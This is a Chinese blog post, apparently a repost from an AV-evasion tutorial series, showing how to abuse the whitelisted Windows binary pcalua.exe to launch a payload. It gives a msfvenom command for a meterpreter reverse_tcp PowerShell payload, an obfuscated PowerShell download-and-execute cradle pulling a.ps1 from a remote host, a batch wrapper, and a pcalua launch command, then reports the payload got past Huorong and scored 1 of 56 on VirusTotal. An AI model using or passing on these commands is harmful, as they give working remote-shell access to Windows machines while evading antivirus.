【免杀篇】远控免杀专题(55)-白名单Pcalua.exe执行payload


当你的才华

还撑不起你的野心时

那你就应该静下心来学习


目录

0x01 Pcalua介绍

0x02 Pcalua使用

0x03 执行payload


0x01 Pcalua介绍

Pcalua是Windows进程兼容性助理(Program Compatibility Assistant)的一个组件。

默认在C:\Windows\System32\pcalua.exe

0x02 Pcalua使用

命令为

Pcalua -m -a payload

0x03 执行payload

这里选择使用powershell生成payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.10 LPORT=8080 -f psh-reflection > a.ps1

并对powershell命令进行混淆处理。

powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://10.211.55.10/a.ps1''))';IEX ($a+$b)"

然后将该命令写成a.bat批处理,方便执行。metasploit进行监听

在测试机上执行该命令

Pcalua -m -a a.bat

发现只有火绒提示"powershell可执行操作" 放行后msf可上线

放在virustotal.com上a.bat查杀率为1/56

参考链接:

基于白名单Wmic 执行 payload 第十季复现:https://blog.csdn.net/ws13129/article/details/89791442


虽然我们生活在阴沟里,但依然有人仰望星空!


猜你喜欢

转载自blog.csdn.net/God_XiangYu/article/details/106112652